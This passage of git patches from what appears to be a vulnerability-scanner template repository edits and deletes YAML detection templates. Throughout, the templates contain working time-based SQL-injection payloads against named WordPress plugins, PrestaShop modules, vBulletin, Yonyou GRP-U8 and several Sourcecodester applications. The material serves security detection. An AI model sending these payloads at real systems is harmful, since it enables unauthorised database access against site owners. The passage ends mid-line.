Content-Type: application/x-www-form-urlencoded diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index daf25ee931..42e5d54133 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -47,6 +47,7 @@ http: - raw: - | + @timeout: 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 18cd1008ff..f6228dfebf 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -40,6 +40,7 @@ http: GET / HTTP/1.1 Host: {{Hostname}} - | + @timeout: 20s GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 3187e5044b..08c6573329 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -29,6 +29,7 @@ info: http: - raw: - | + @timeout: 20s POST /modules/miniform/ajax_delete_message.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 2c624e7f27..b8a0aa7316 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -54,6 +54,7 @@ http: - raw: - | + @timeout: 20s POST /hoteldruid/personalizza.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded diff --git a/http/vulnerabilities/other/erensoft-sqli.yaml b/http/vulnerabilities/other/erensoft-sqli.yaml index c7722a77be..95cc77b38b 100644 --- a/http/vulnerabilities/other/erensoft-sqli.yaml +++ b/http/vulnerabilities/other/erensoft-sqli.yaml @@ -17,6 +17,7 @@ info: http: - raw: - | + @timeout: 20s GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml index da7f1b0bdb..33267bae1e 100644 --- a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml +++ b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml @@ -17,6 +17,7 @@ info: http: - raw: - | + @timeout: 20s POST /m/apmarketplace/passwordrecovery HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded diff --git a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml index dca2ba7059..3d22b7d2c1 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml @@ -2,7 +2,7 @@ id: vbulletin-ajaxreg-sqli info: name: vBulletin 3.x / 4.x AjaxReg - SQL Injection - author: MaStErChO + author: mastercho severity: critical description: | vBulletin versions 3.x and 4.x suffer from an AjaxReg remote blind SQL injection vulnerability. @@ -21,6 +21,7 @@ info: http: - raw: - | + @timeout: 20s POST /ajax.php?do=inforum&listforumid=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&result=10 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded From a4c09b87195d3686d34ce3d69e35b9ca6ac9cb37 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 22 Jun 2024 22:19:54 -0700 Subject: [PATCH 0507/1841] updated template format for sqli templates with timeout --- http/cves/2021/CVE-2021-39165.yaml | 8 ++++--- http/cves/2023/CVE-2023-6360.yaml | 16 ++++++++----- http/cves/2023/CVE-2023-6567.yaml | 8 ++++--- http/cves/2024/CVE-2024-1061.yaml | 8 ++++--- .../wp-autosuggest-sql-injection.yaml | 8 ++++--- .../wordpress/wp-statistics-sqli.yaml | 23 +++++++++++++++---- .../yonyou/yonyou-u8-sqli.yaml | 16 ++++++++++--- 7 files changed, 61 insertions(+), 26 deletions(-) diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index b8172d9f51..280d635a49 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -34,9 +34,11 @@ info: tags: cve,cve2021,cachet,sqli,chachethq http: - - method: GET - path: - - "{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--" + - raw: + - | + @timeout: 20s + GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1 + Host: {{Hostname}} redirects: true max-redirects: 2 diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index 49a9b9aa46..06a839dd4f 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -31,12 +31,14 @@ info: framework: wordpress fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson + flow: http(1) && http(2) http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt" + - raw: + - | + GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1 + Host: {{Hostname}} matchers: - type: word @@ -44,9 +46,11 @@ http: words: - 'My Calendar' - - method: GET - path: - - "{{BaseURL}}/?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a" + - raw: + - | + @timeout: 20s + GET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index b4b169302e..280685922d 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -33,9 +33,11 @@ info: tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress http: - - method: GET - path: - - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1" + - raw: + - | + @timeout: 20s + GET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 370ab6089f..51f07678f6 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -34,9 +34,11 @@ info: tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins http: - - method: GET - path: - - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-" + - raw: + - | + @timeout: 20s + GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml index 9c44aa3e9e..27ba0d61b1 100644 --- a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml @@ -15,9 +15,11 @@ info: tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ" + - raw: + - | + @timeout: 20s + GET /wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml index f30d06d3fb..43b4b4394f 100644 --- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml @@ -17,17 +17,30 @@ info: publicwww-query: /wp-content/plugins/wp-statistics/ tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp +flow: http(1) && http(2) + http: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)" - - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" + - raw: + - | + GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + words: + - 'WP Statistics' + internal: true + + - raw: + - | + @timeout: 20s + GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a) HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=6' - - 'contains(content_type, "text/html") && contains(body_2, "WP Statistics")' - 'status_code == 500' condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml index b4c69fd1f6..8502df050f 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml @@ -15,13 +15,24 @@ info: fofa-query: icon_hash="-299520369" tags: yonyou,grp,sqli +flow: http(1) && http(2) + + http: - raw: - | GET /login.jsp HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + + matchers: + - type: word + words: + - 'GRP-U8' + internal: true + + - raw: - | + @timeout: 20s POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -32,8 +43,7 @@ http: - type: dsl dsl: - 'duration_2>=6' - - 'status_code == 200' - - 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")' + - 'contains(content_type, "text/html")' condition: and # digest: 4a0a00473045022100ff26707ab7b707eb63657075468f8fb5c9be2587a852c61a038cd6e74f11d80902201a654b27bab1bfb591f1d1cfd0517a439d2b61b67636eff6fac15f5091503614:922c64590222798bb761d5b6d8e72950 From 28e34b09e7b5fd92c072d1f645acc24b55fbccfe Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 22 Jun 2024 22:23:27 -0700 Subject: [PATCH 0508/1841] Removed CVEs templates for miscellaneous / random / non-active projects --- http/cves/2020/CVE-2020-21012.yaml | 49 ------------------------ http/cves/2020/CVE-2020-29284.yaml | 55 --------------------------- http/cves/2021/CVE-2021-28419.yaml | 61 ------------------------------ http/cves/2021/CVE-2021-40908.yaml | 49 ------------------------ http/cves/2022/CVE-2022-28022.yaml | 51 ------------------------- http/cves/2022/CVE-2022-28023.yaml | 51 ------------------------- http/cves/2022/CVE-2022-31980.yaml | 45 ---------------------- http/cves/2022/CVE-2022-31981.yaml | 45 ---------------------- http/cves/2022/CVE-2022-31982.yaml | 45 ---------------------- http/cves/2022/CVE-2022-31983.yaml | 47 ----------------------- http/cves/2023/CVE-2023-29622.yaml | 50 ------------------------ 11 files changed, 548 deletions(-) delete mode 100644 http/cves/2020/CVE-2020-21012.yaml delete mode 100644 http/cves/2020/CVE-2020-29284.yaml delete mode 100644 http/cves/2021/CVE-2021-28419.yaml delete mode 100644 http/cves/2021/CVE-2021-40908.yaml delete mode 100644 http/cves/2022/CVE-2022-28022.yaml delete mode 100644 http/cves/2022/CVE-2022-28023.yaml delete mode 100644 http/cves/2022/CVE-2022-31980.yaml delete mode 100644 http/cves/2022/CVE-2022-31981.yaml delete mode 100644 http/cves/2022/CVE-2022-31982.yaml delete mode 100644 http/cves/2022/CVE-2022-31983.yaml delete mode 100644 http/cves/2023/CVE-2023-29622.yaml diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml deleted file mode 100644 index 6723aeb449..0000000000 --- a/http/cves/2020/CVE-2020-21012.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2020-21012 - -info: - name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection - author: edoardottt - severity: critical - description: | - Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0. - reference: - - https://github.com/hitIer/web_test/tree/master/hotel - - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-21012 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-21012 - cwe-id: CWE-89 - epss-score: 0.07351 - epss-percentile: 0.94065 - cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: hotel_and_lodge_booking_management_system_project - product: hotel_and_lodge_booking_management_system - tags: cve,cve2020,hotel,sqli,unauth,hotel_and_lodge_booking_management_system_project - -http: - - raw: - - | - POST /forgot_password.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - btn_forgot=1&email=1%27%20or%20sleep(6)%23 - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(body, "Hotel Booking System")' - condition: and -# digest: 490a0046304402206a88819f2a86877b474553fa4d72a8497496bda2b7febbd32b1d01a50895f70f0220064783fae9efeb7a0a87128c5598da4c150295bc3d5edc3c723dd92cf3bdf564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml deleted file mode 100644 index e086b0633b..0000000000 --- a/http/cves/2020/CVE-2020-29284.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2020-29284 - -info: - name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection - author: edoardottt - severity: critical - description: | - Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0. - reference: - - https://www.exploit-db.com/exploits/48984 - - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip - - https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md - - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 - - https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-29284 - cwe-id: CWE-89 - epss-score: 0.14147 - epss-percentile: 0.95695 - cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: multi_restaurant_table_reservation_system_project - product: multi_restaurant_table_reservation_system - tags: cve,cve2020,tablereservation,sqli,unauth,edb,multi_restaurant_table_reservation_system_project - -http: - - method: GET - path: - - "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'duration>=6' - - - type: word - part: body - words: - - "Restaurent Tables" - - "Chair List" - condition: and - - - type: status - status: - - 200 -# digest: 490a0046304402204a961e5e3dc591d1ed31952da38d3c4adda8a605b53182dd3cfaf34a4587adbd02204bc0a9fd3fd1d1cf9066837dfe68c9e2892868bd518817ec6fd744cfd35eaff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml deleted file mode 100644 index bc3136d63f..0000000000 --- a/http/cves/2021/CVE-2021-28419.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2021-28419 - -info: - name: SEO Panel 4.8.0 - Blind SQL Injection - author: theamanrawat - severity: high - description: | - SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - impact: | - Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. - remediation: | - Upgrade to a patched version of SEO Panel or apply the necessary security patches. - reference: - - https://github.com/seopanel/Seo-Panel/issues/209 - - https://www.seopanel.org/spdownload/4.8.0 - - https://nvd.nist.gov/vuln/detail/CVE-2021-28419 - - http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2021-28419 - cwe-id: CWE-89 - epss-score: 0.15235 - epss-percentile: 0.95839 - cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: seopanel - product: seo_panel - tags: cve2021,cve,sqli,seopanel,auth,packetstorm - -http: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Cookie: _csrf={{rand_base(54,"abc")}}; - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}login.php - Cookie: _csrf={{rand_base(54,"abc")}}; - - sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login= - - | - GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1 - Host: {{Hostname}} - Cookie: _csrf={{rand_base(54,"abc")}}; - - matchers: - - type: dsl - dsl: - - 'duration_3>=6' - - 'status_code_3 == 200' - - 'contains(body_3, "Overall Report Summary")' - condition: and -# digest: 4b0a00483046022100ebd0306427622fbd07c1768dfa8ecb58d13a80f7971106070053c48fa894595a022100cd93ac88aa8efefeabbeed69ff2de4875f337e81be596b93045772e4b1554ff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml deleted file mode 100644 index 00697c5f2e..0000000000 --- a/http/cves/2021/CVE-2021-40908.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2021-40908 - -info: - name: Purchase Order Management v1.0 - SQL Injection - author: theamanrawat - severity: critical - description: | - SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. - reference: - - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09 - - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-40908 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-40908 - cwe-id: CWE-89 - epss-score: 0.0161 - epss-percentile: 0.87425 - cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 1 - vendor: purchase_order_management_system_project - product: purchase_order_management_system - tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project - -http: - - raw: - - | - POST /classes/Login.php?f=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - username=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(header, "text/html")' - - 'contains(body, "status\":\"incorrect\"")' - condition: and -# digest: 4a0a0047304502201d9682cdcb8a39247b1f2923f30931761018c186957eca58eef1294ee24c2fa9022100dd83265eb60eb8119663c8d5805b5654203d946f4cf1ee4cb28f0414ac670ca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml deleted file mode 100644 index 804074e72b..0000000000 --- a/http/cves/2022/CVE-2022-28022.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-28022 - -info: - name: Purchase Order Management v1.0 - SQL Injection - author: theamanrawat - severity: critical - description: | - Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. - reference: - - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md - - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-28022 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/debug601/bug_report - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-28022 - cwe-id: CWE-89 - epss-score: 0.02031 - epss-percentile: 0.87755 - cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 1 - vendor: purchase_order_management_system_project - product: purchase_order_management_system - tags: cve,cve2022,sqli,purchase-order-management-system,purchase_order_management_system_project - -http: - - raw: - - | - POST /classes/Master.php?f=delete_item HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(header, "text/html")' - - 'contains(body, "status\":\"success")' - condition: and -# digest: 490a0046304402207642be1d7f464fbdee2b2c77ec3ff7744acd40cd51c5d4b48b4d5a1b9eb298970220699beadc0427e71dde4e50f58c205c159cd96486d5cfb6ae26453b5c8a316cca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml deleted file mode 100644 index d2d35ad63c..0000000000 --- a/http/cves/2022/CVE-2022-28023.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-28023 - -info: - name: Purchase Order Management v1.0 - SQL Injection - author: theamanrawat - severity: critical - description: | - Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md - - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-28023 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/debug601/bug_report - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-28023 - cwe-id: CWE-89 - epss-score: 0.0161 - epss-percentile: 0.87425 - cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 1 - vendor: purchase_order_management_system_project - product: purchase_order_management_system - tags: cve,cve2022,sqli,purchase-order,poms,purchase_order_management_system_project - -http: - - raw: - - | - POST /classes/Master.php?f=delete_supplier HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(header, "text/html")' - - 'contains(body, "status\":\"success")' - condition: and -# digest: 4b0a00483046022100c1b076f7cdfb320f0d71c0f505593b36b406e9e696bb737f0a0d61388ad61e80022100c896c24e641121b1bff83ab1240ae92d23978d4f6a153271867759af201479fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml deleted file mode 100644 index 3c9c973c05..0000000000 --- a/http/cves/2022/CVE-2022-31980.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-31980 - -info: - name: Online Fire Reporting System v1.0 - SQL injection - author: theamanrawat - severity: high - description: | - Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. - reference: - - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md - - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-31980 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-31980 - cwe-id: CWE-89 - epss-score: 0.01429 - epss-percentile: 0.85199 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 1 - vendor: online_fire_reporting_system_project - product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project - -http: - - method: GET - path: - - "{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN" - - matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(content_type, "text/html")' - - 'contains(body, "Control Teams")' - condition: and -# digest: 4b0a00483046022100d3341f65cb26f4caef4623c562e9c774a42d72d1b51a42bb411f7ff44a7bf95d022100b2ee810fbeb3fca59b9907d6cdfe24246501706f3d77fa3b5e7526e32f8fc395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml deleted file mode 100644 index e39d07ae88..0000000000 --- a/http/cves/2022/CVE-2022-31981.yaml +++ 